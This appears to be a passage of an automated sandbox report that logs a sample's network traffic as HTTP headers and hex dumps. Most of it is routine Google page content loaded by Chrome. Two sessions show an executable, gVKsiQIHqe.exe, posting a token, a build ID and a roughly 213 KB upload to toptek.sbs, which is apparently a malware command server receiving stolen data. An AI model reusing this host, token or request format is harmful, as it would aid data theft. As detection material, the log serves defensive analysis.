                                                                                                                                                                                                                                                                                    Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:36 UTC1390INData Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64
                                                                                                                                                                                                                                                                                    Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:36 UTC1390INData Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20
                                                                                                                                                                                                                                                                                    Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:36 UTC716INData Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c
                                                                                                                                                                                                                                                                                    Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:36 UTC756INData Raw: 32 65 64 0d 0a 68 65 61 64 65 72 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 51 63 20 67 62 5f 4f 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 31 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 42 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 43 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 61 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 34 64 20 67 62 5f 44 63 20 67 62 5f 37 64 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 47 6f 6f 67 6c 65 5c 22 20 68 72 65 66 5c 75 30 30 33 64 5c 22 2f 3f 74 61 62 5c 75 30
                                                                                                                                                                                                                                                                                    Data Ascii: 2edheader\u003e\u003cdiv class\u003d\"gb_Qc gb_Oc\"\u003e\u003cdiv class\u003d\"gb_1c\"\u003e\u003cdiv class\u003d\"gb_Bc\"\u003e\u003cdiv class\u003d\"gb_Cc\"\u003e\u003ca class\u003d\"gb_4d gb_Dc gb_7d\" aria-label\u003d\"Google\" href\u003d\"/?tab\u0
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:36 UTC1390INData Raw: 38 30 30 30 0d 0a 2c 31 30 32 32 37 38 32 30 35 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 5c 75 30 30 33 64 74 68 69 73 3b 5c 6e 74 72 79 7b 5c 6e 5f 2e 78 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 21 61 2e 6a 29 69 66 28 63 20 69 6e 73 74 61 6e 63 65 6f
                                                                                                                                                                                                                                                                                    Data Ascii: 8000,102278205],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_||{};(function(_){var window\u003dthis;\ntry{\n_.xd\u003dfunction(a,b,c){if(!a.j)if(c instanceo
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:36 UTC1390INData Raw: 72 6e 5b 5d 7d 3b 47 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 46 64 28 62 5c 75 30 30 33 64 5c 75 30 30 33 65 62 2e 73 75 62 73 74 72 28 30 2c 61 2e 6c 65 6e 67 74 68 2b 31 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 61 2b 5c 22 3a 5c 22 29 7d 3b 5f 2e 48 64 5c 75 30 30 33 64 67 6c 6f 62 61 6c 54 68 69 73 2e 74 72 75 73 74 65 64 54 79 70 65 73 3b 5f 2e 49 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 30 30 33 64 61 7d 74 6f 53 74 72 69 6e 67 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 7d 7d 3b 5f 2e 4a 64 5c 75 30 30 33 64 6e 65 77 20 5f 2e 49 64 28 5c 22 61 62 6f 75 74 3a 69 6e 76
                                                                                                                                                                                                                                                                                    Data Ascii: rn[]};Gd\u003dfunction(a){return new _.Fd(b\u003d\u003eb.substr(0,a.length+1).toLowerCase()\u003d\u003d\u003da+\":\")};_.Hd\u003dglobalThis.trustedTypes;_.Id\u003dclass{constructor(a){this.i\u003da}toString(){return this.i}};_.Jd\u003dnew _.Id(\"about:inv
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:36 UTC1390INData Raw: 2e 59 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 49 64 29 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 49 64 29 61 5c 75 30 30 33 64 61 2e 69 3b 65 6c 73 65 20 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 65 6c 73 65 20 61 5c 75 30 30 33 64 5f 2e 58 64 28 61 29 3b 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 5a 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 29 7b 6c 65 74 20 63 2c 64 3b 62 5c 75 30 30 33 64 28 64 5c 75 30 30 33 64 28 63 5c 75 30 30 33 64 5c 22 64 6f 63 75 6d 65 6e 74 5c 22 69 6e 20 62 3f 62 2e 64 6f 63 75 6d 65 6e 74 3a 62 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 29 5c 75 30 30 33 64 5c 75 30 30 33 64 6e
                                                                                                                                                                                                                                                                                    Data Ascii: .Yd\u003dfunction(a){if(a instanceof _.Id)if(a instanceof _.Id)a\u003da.i;else throw Error(\"F\");else a\u003d_.Xd(a);return a};_.Zd\u003dfunction(a,b\u003ddocument){let c,d;b\u003d(d\u003d(c\u003d\"document\"in b?b.document:b).querySelector)\u003d\u003dn
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:36 UTC1390INData Raw: 6f 72 41 6c 6c 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 5c 22 2a 5c 22 29 29 5b 30 5d 7c 7c 6e 75 6c 6c 29 29 3b 72 65 74 75 72 6e 20 61 7c 7c 6e 75 6c 6c 7d 3b 5c 6e 5f 2e 6b 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 5f 2e 79 62 28 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 79 6c 65 5c 22 3f 61 2e 73 74 79 6c 65 2e 63 73 73 54 65 78 74 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 63 6c 61 73 73 5c 22 3f 61 2e 63 6c 61 73 73 4e 61 6d 65 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 66 6f 72 5c 22 3f 61 2e 68 74 6d 6c 46 6f 72 5c 75 30 30 33 64 63 3a 6a 65
                                                                                                                                                                                                                                                                                    Data Ascii: orAll(a?\".\"+a:\"\"):b.getElementsByTagName(\"*\"))[0]||null));return a||null};\n_.ke\u003dfunction(a,b){_.yb(b,function(c,d){d\u003d\u003d\"style\"?a.style.cssText\u003dc:d\u003d\u003d\"class\"?a.className\u003dc:d\u003d\u003d\"for\"?a.htmlFor\u003dc:je


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    11192.168.2.549715142.250.181.1324436156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:35 UTC353OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: www.google.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:36 UTC933INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Version: 705503573
                                                                                                                                                                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                    Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                    Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                    Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:57:36 GMT
                                                                                                                                                                                                                                                                                    Server: gws
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                    Accept-Ranges: none
                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:36 UTC35INData Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1d)]}'{"update":{"promos":{}}}
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    12192.168.2.54974794.130.188.574435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:40 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----HLNYCBIMYUSRIEC26FKN
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 505
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:40 UTC505OUTData Raw: 2d 2d 2d 2d 2d 2d 48 4c 4e 59 43 42 49 4d 59 55 53 52 49 45 43 32 36 46 4b 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 48 4c 4e 59 43 42 49 4d 59 55 53 52 49 45 43 32 36 46 4b 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 48 4c 4e 59 43 42 49 4d 59 55 53 52 49 45 43 32 36 46 4b 4e 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------HLNYCBIMYUSRIEC26FKNContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------HLNYCBIMYUSRIEC26FKNContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------HLNYCBIMYUSRIEC26FKNCont
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:41 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:57:41 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:41 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    13192.168.2.54974994.130.188.574435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:41 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----FK68QQ16FUSRIECT0ZMG
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 213453
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:41 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 46 4b 36 38 51 51 31 36 46 55 53 52 49 45 43 54 30 5a 4d 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 46 4b 36 38 51 51 31 36 46 55 53 52 49 45 43 54 30 5a 4d 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 46 4b 36 38 51 51 31 36 46 55 53 52 49 45 43 54 30 5a 4d 47 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------FK68QQ16FUSRIECT0ZMGContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------FK68QQ16FUSRIECT0ZMGContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------FK68QQ16FUSRIECT0ZMGCont
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:41 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:41 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:41 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:41 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
